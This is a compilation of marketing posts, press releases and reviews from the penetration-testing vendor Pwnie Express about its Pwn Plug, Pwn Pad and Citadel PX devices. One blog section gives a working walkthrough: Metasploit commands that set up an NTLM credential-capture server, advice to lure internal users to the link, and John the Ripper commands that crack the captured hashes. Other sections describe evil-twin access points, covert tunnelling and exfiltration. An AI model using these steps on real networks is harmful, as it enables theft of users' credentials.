Vulnerability Assessment and Penetration Testing Across the Enterprise

In this new white paper by Pwnie Express, we provide an overview of vulnerability assessment and penetration testing. We demonstrate why such measures are critical to the long-term health and success of enterprises across vertical industries. We also present the features and benefits of Pwnie Express’s technologies, which are the only vulnerability assessment and penetration testing solutions on the market that assess wired and wireless network security in hard-to-reach remote locations, simply, cost-effectively and on demand.

[button link=”” size=”large” color=”red”]Download Now…[/button]


Today’s increasingly complex enterprise IT infrastructures consist of hundreds if not thousands of systems and subsystems generally distributed and often in hard-to-reach locations.  The growing use of varying technologies by enterprises and their employees as wired and wireless systems evolve makes the task of assessing the security risks associated with the seemingly endless stream of vulnerabilities and attack vectors ever more pressing and difficult.

IT security team members need to be all seeing, all knowing. They require continuous insight into who and what is hitting their infrastructure and must adopt vulnerability assessment and penetration testing as an integral part of their security and risk management.  For IT staffs responsible for maintaining the infrastructure and continually evaluating the security posture, vulnerability assessment and penetration testing will enable them to:

  • See all the things.  Vulnerability assessment and penetration testing provides critical visibility, showing the weaknesses in all aspects of an organization’s infrastructure. By obtaining this invaluable insight on demand in both wired and wireless networks, an organization can identify which threats pose real exploitable risks and can intelligently manage them.
  • Meet compliance mandates. Federal governments and industry consortiums have recognized the escalating cyber crime threat and subsequent increasing number of breaches. To mitigate risk they have established regulations like the Payment Card Industry Data Security Standard (PCI DSS). Implementing a strong assessment and testing program enables organizations to provide the information they need to meet compliance and more importantly heighten their actual security posture.
  • Avoid network downtime. In the short term, recovering from a security breach can result in lost revenues, and costly and timely OT remediation efforts.  In the long term, downtime could lead to customer flight and cost an organization millions of dollars. By preventing interruptions customers can continue to transact and revenue can continue to flow.
  • Maintain corporate brand. Every single incident of compromised customer data also can be costly to a company’s reputation as trust is breached.  By seeing all the things organizations now have insight into potential threat vectors across their entire distributed infrastructures enabling them to prevent or quickly mitigate breaches to ensure their brand equity remains intact.
  • Justify existing security investments. Vulnerability assessment and penetration validates the effectiveness of an organization’s current security infrastructure. The increased visibility can be used to demonstrate what, if any, additional security technologies need to be instituted and/or security measures need to be taken.


Focused on Making Network Security Improvement Easier

I want to explain my excitement about joining the Pwnie Express team and talk about what we are doing. I am excited to join Dave Porcello. For those of you who are new to Pwnie Express, Dave founded the company after he developed a way to easily assess the security of remote locations with low profile Pwn Plugs that work the moment they are plugged in. He then created a very cool Pwn Pad to arm mobile security professionals charged with protecting their organizations.

A couple of years ago, Dave left his day job and started selling these stealthy plugs full time out of his basement in Vermont. The Pwn Plugs and Pads are smart and pack an incredible amount of capability into a small device, costing just over $1,000 dollars each. These powerful, low profile little gems can see all the wired and wireless connections in a location and that’s only the beginning of what they can do. 406 Ventures and Fairhaven Capital invested in Dave and his idea and I had the opportunity to join him.

We now opened a small office in Boston’s Seaport and maintain our research lab in Vermont. We are building a team that is focused on continuing to make it incredibly simple to see all the things in your remote networks, wired and wireless, and know if and how your network security is working.

Most companies have limited knowledge of what’s going on in remote locations because assessments are costly and difficult to conduct in distributed enterprises with far flung branch offices and firewalls by design limit visibility and testing. Because Pwnie Express operates without compromising security policies and the devices can be easily shipped and plugged in, we make it effortless for organizations to monitor all of their remote locations from one point.

Stay tuned as we develop new, straightforward and more powerful devices as well as a secure central service that will make it simple to see and know about all the things running in your remote locations.

We believe it is important to make it easy for organizations to improve their network security while dramatically lowering the costs to assess remote locations.

Pwnie Express Releases Next Generation of Groundbreaking Pwn Pad

Vulnerability Intelligence and Penetration Testing Tablet is Faster, Lighter and Easier to Use than Ever

December 18, 2013

Pwnie Express today announced the release of the latest version of its lauded Pwn Pad, a tablet that provides IT professionals unprecedented mobility and ease of use in assessing wired and wireless networks.

The leader in vulnerability intelligence and penetration testing devices, the latest Pwn Pad, the Pwn Pad 2014, is faster, thinner, lighter, sharper and easier to use than ever. The ideal choice for pentester’s who are on the road or conducting a company or agency walk through, the new version of the Pwn Pad with its 7” tablet screen offers a streamlined ‘one-click’ software update process, making it to easy update.

“We are thrilled to announce the latest version of the Pwn Pad,” said Dave Porcello, Pwnie Express CTO and founder. “Using the popular Nexus 7 tablet from Google, the Pwn Pad 2014 offers a custom Android front-end with one-touch pentesting applications as well as a custom Kali Linux back-end with a comprehensive pentesting suite.”

Pwn Pad Core Features Include:

  • Custom Android front-end with one-touch pentesting applications, including Evil AP, Strings Watch, Full-Packet Capture, Bluetooth Scan, & SSL Strip
  • Custom Kali Linux back-end with comprehensive pentesting suite, including Metasploit, SET, Kismet, Aircrack-NG, SSLstrip, Ettercap-NG, Bluelog, Wifite, Reaver, MDK3, & FreeRADIUS-WPE
  • Simple web-based administration and in-product updates with “Pwnie UI”
  • 6 different covert channels to tunnel through application-aware firewalls & IPS
  • High performance CPU/GPU, large HD display, powerful battery (up to 9 hours active use)
  • External high-gain Bluetooth supporting packet injection (up to 1000′)
  • External USB-Ethernet adapter for wired network pentesting

Pwnie Express provides cost effective, rapid deployment products comprised of innovative sensors available in a variety of form factors that deliver previously unattainable intelligence that makes it incredibly easy to evaluate risk in remote and distributed environments. More than a 1000 enterprises across verticals including retail, finance, health, and manufacturing as well as service providers and government organizations rely on Pwnie Express to know who and what is accessing their networks.

About Pwnie Express
Pwnie Express is the leading provider of innovative sensors that assess network and wireless security risks in remote locations. Over 1000 enterprises and government organizations worldwide rely on Pwnie Express’s products to conduct drop-box penetration testing and receive unprecedented insight into their distributed network infrastructure. Pwnie Express’s smart devices leverage open source tools and platforms. The award-winning products are backed by the expertise of Pwnie Labs, the company’s security research arm.

[Press Release]

European Parliament Gets PWNED

By Rene Millman

On Monday the 25th of November a memo was released to the  European Parliament Free Software User group mailing list announcing that they were going to be disabling the public wireless network. This is in response to a man-in-the-middle style attack which successfully intercepted traffic between cell-phones and the unencrypted wireless.

UK Tech Blog IT Pro did a writeup of the attack in which they suggest that the attack occurred when “hackers set up an “evil twin” wireless router near the building in Strasbourg and had stolen the usernames and passwords of 14 people at the European Parliament.”

As more employees bring their own devices into the workplace, businesses face the challenge of enforcing corporate security policies on consumer devices that are not solely controlled by the IT department,” said Jason Hart, vice president of cloud solutions at security firm SafeNet. “Most employees now store a wide range of both personal and business information on their mobile devices, so this lack of control exposes businesses to serious security vulnerabilities in the form of data breaches and unauthorised access.

This sounds strikingly similar to the “Evil AP” tool offered on Pwnie Express’ Pwn Pad line of products.
In the Evil AP attack the Pwn Pad tablet identifies networks which are being requested by other devices in its area. It accepts the requests for connection and acts to route their traffic through to the Internet allowing for redirection to malicious services or, as in the case of the European Parliament, interception of transmitted data and credentials. Devices with insecure wireless configurations are easily identifiable using this technique.

Announcing the Pwn Plug R2!

Today we’re very proud to announce a new product, the Pwn Plug R2.

This brand new release builds on the massive success of the Pwn Plug Elite, and brings with it a number of customer-requested features.

Ars Technica says it best: “inside, it’s really a Linux-powered NSA-in-a-box, providing white hat hackers and corporate network security professionals a “drop box” system that can be remotely controlled over a covert Internet channel or a cellular data connection.”

Hardware-wise, we have great news: no more external dongles for dual-ethernet or wireless! The R2 has onboard high-gain wireless and dual-ethernet, external high-gain Bluetooth, 4G/GSM cellular, and more builtin storage.

This release also brings the newest version of our Pwnix software to the device as well, allowing the system to be updated easily, and laying the groundwork for integration with other Pwnie Express products.

We’ll be at Black Hat and DEFCON all week showing it off, stop by, say hello, and take a look at the R2!

Click here to see the full specs for the Pwn Plug R2.


UPDATE: Yep, we’ll absolutely still be supporting the original Pwn Plug via the regular support channels.

Capturing Integrated Windows Authentication with the Plug

The fine folks over at the Gentleman’s Hacker’s Club recently dropped a fun tidbit about the GoDaddy URL Shortener leaking NTLM creds over the Internet.  It’s worth mentioning that the vulnerability of the browser auto-submitting credentials isn’t just specific to GoDaddy but rather to anyone using an IE browser connected to a domain. It’s odd that credentials were being submitted over the internet, but this is presumably specific to their URL shortener setup.

It turns out that capturing NTLM credentials is a very relevant attack vector, especially on internal networks. The reason the Windows browser submits creditials is something called Integrated Windows Authentication. This turns out to work particularly well on internal networks, as the default is to allow authentication in the local LAN. Here’s a quick demo of how to test for it using the Pwn Plug:

First, open up a shell, and fire up the metasploit framework:

root@pwnix-dev:$ cd /opt/metasploit/msf3
root@pwnix-dev:$ ./msfconsole
MSF> use auxiliary/server/capture/http_ntlm
MSF (http_ntlm)> set JOHNPWFILE /tmp/creds.txt
MSF (http_ntlm)> set URIPATH /capture
MSF (http_ntlm)> set SRVPORT 8080

Once you’ve configured the http_ntlm module, it should look something like this when you type ‘info’:


Run exploit -z in order to start the server and you should see:

[*] Auxiliary module execution completed
[*] Using URL:
[*]  Local IP:
[*] Server started.

Great, now we’re capturing any credentials sent to the Plug. Even if Integrated Windows Authentication isn’t configured, the user browsing to this site will see an authentication prompt.

Simply send out your link to internal folks, or post it to some location where it will be noticed and clicked. Distribution is left as an exercise for the reader.

Once we have some captured credentials in our /tmp/cred.txt file, we’ll want to fire up John the Ripper, and get to cracking. You’ll want to pull down the latest John / jumbo patch in order to crack the NTLM hashes, so grab the latest.

    pwnie@pwnix-dev:$ wget
    pwnie@pwnix-dev:$ tar -zxvf john-1.7.9-jumbo-7.tar.gz
    pwnie@pwnix-dev:$ cd john-1.7.9-jumbo-7/src
    pwnie@pwnix-dev:~/john-1.7.9-jumbo-7/src$ make generic
    pwnie@pwnix-dev:~/john-1.7.9-jumbo-7/src$ cd ../run

    pwnie@pwnix-dev:~/john-1.7.9-jumbo-7/run:$ ./john /tmp/creds.txt_netntlm
    Loaded 2 password hashes with no different salts (NTLMv1 C/R MD4 DES (ESS MD5) [32/64])
    test             (test)
    test             (test)
    guesses: 2  time: 0:00:00:00 DONE (Fri Jan 18 09:47:10 2013)  c/s: 70600  trying: test!!! - tst

And there you have it, simple & easy credential stealing.

If you want to take this attack a little further, take a look at @zfasel’s ZackAttack project which relays credentials to the domain, allowing you to easily pop a shell via a submitted NTLM credential.

Exfiltration and Covert Channels in Cyber Defense Magazine

Hey all, we wanted to give you a heads up on an article we put together in the new Cyber Defense Magazine. The article talks about current data exfiltration techniques – both by automated and manual techniques, and commonly used tools in that environment. Here’s a small excerpt from the article:

A point of access must first be established – this is what is traditionally referred to as the security breach. This is commonly occuring via a client-side exploit, weak system credentials, or SQL injection. According to recent reports, the most commonly used technique today by sentient attackers is via your own remote access applications – RDP or even your own VPN.

Once that point of access is obtained, the attacker then goes looking for interesting data in the environment. Data at rest is often gathered via built-in Windows shares or FTP, and data in transit is gathered with a variety of techniques, the most common of which is now parsing memory, where data is unencrypted and available for the taking.

Attackers are likely to use your own built-in tools to exfiltrate data too. Because these remote access tools are typically encrypted, and traditionally hard to inspect, this is an easy way for the attacker to pull data out of the environment without detection. One of the best things you can do to protect yourself is monitor usage of the channels, and watch for anomalies.

Today’s malware is also using common internet protocols to send your data out. Partially because of the complexity of automating remote access solutions, and in part due to the availability HTTPS, FTP and SMTP libraries, these protocols are often used by malware to send data out of the environment.

The article goes on to talk about advanced techniques in data exfiltration, something we’ve focused on a lot here at Pwnie Express:

Using a technique called “tunneling,” data can be encrypted in archives or in transit, limiting the ability to inspect it at a proxying firewall – It just looks like traffic over HTTP/S, or DNS, or ICMP, among others. These are commonly referred to as “covert channels.” With covert channels, attackers can hide what they are saying or passing by writing a message inside a message, much like stenography can hide a picture inside a picture.

We fact-checked against the recent breach reports, specifically Trustwave’s excellent ‘Global Security Report‘. If you’re interested in the full article, check out Cyber Defense Magazine.

PC Mag Editors Choice Review

Pwn Plug Product Review by PC Magazine 

by Fahmida Y. Rashid 

Pwn Plug (Basic: $480, Elite: $770) is a harmless-looking little white device that makes it possible to run penetration tests against any network easily and unobtrusively. A mini-computer that looks more like an oversized power adapter, it comes pre-loaded with various hacking tools to probe open ports on networks, sniff incoming and outgoing data packets, hijack SSL traffic, and crack wireless encryption keys, among others. With Pwn Plug, security teams can scan and check the security of their networks, making it an invaluable part of any network administrator’s arsenal of tools.


(Original Article)

Distributed Penetration Testing Becomes Easy With Pwnie Express Citadel PX

By Ritu Saxena

Pwnie Express, the company that came into existence in late 2009, with a mission to provide innovative security assessment products for today’s enterprises, has recently announced an all new security assessment and remote penetration testing product for distributed enterprises called Citadel PX. Citadel PX forms the core part of Pwnie Express’s vision of controlling enterprise-wide penetration testing and security assessment from a single interface.

Citadel PX is a scalable and rapid-deployment solution backed by hardware or virtual sensors which continuously monitors the network, runs vulnerability assessments, and conducts penetration tests from anywhere in the world. The console or Command Post serves a central interface to manage the sensors and gather results. Once the sensors are installed and configured, they initiate a reverse connection back to the Command Post, giving IT Admin control of their capabilities and automation.

 (Original Article)